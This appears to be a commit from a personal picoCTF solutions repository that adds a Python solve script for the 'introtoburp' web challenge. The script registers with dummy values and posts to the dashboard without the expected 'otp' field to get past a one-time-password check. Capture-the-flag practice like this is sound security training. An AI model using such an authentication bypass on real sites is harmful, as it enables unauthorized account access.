oysteikt/picoctf
oysteikt
/
picoctf
0
0
Fork 0
Code Issues Pull Requests Activity

web/introtoburp

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-05 18:51:52 +02:00
parent d92516b7ee
commit 341ff699a3
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
1 changed files with 35 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
web/introtoburp/solve.py Executable file
View File

@ -0,0 +1,35 @@
#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.requests python3Packages.beautifulsoup4
import requests
from bs4 import BeautifulSoup
BASE_URL = "http://titan.picoctf.net:65280/"
def main():
s = requests.Session()
# Get cookie + csrf
res = s.get(BASE_URL).text
csrf = BeautifulSoup(res, features = 'html.parser').find('input', {'name': 'csrf_token'})['value']
res = s.post(
BASE_URL,
data = {
'csrf_token': csrf,
'full_name': 'a',
'username': 'b',
'phone_number': 'c',
'city': 'd',
'password': 'e',
'submit': 'Register',
},
)
# NOTE: this is broken if it doesn't get the 'otp' argument it expects
res = s.post(BASE_URL + 'dashboard')
print(res)
print(res.text)
if __name__ == "__main__":
main()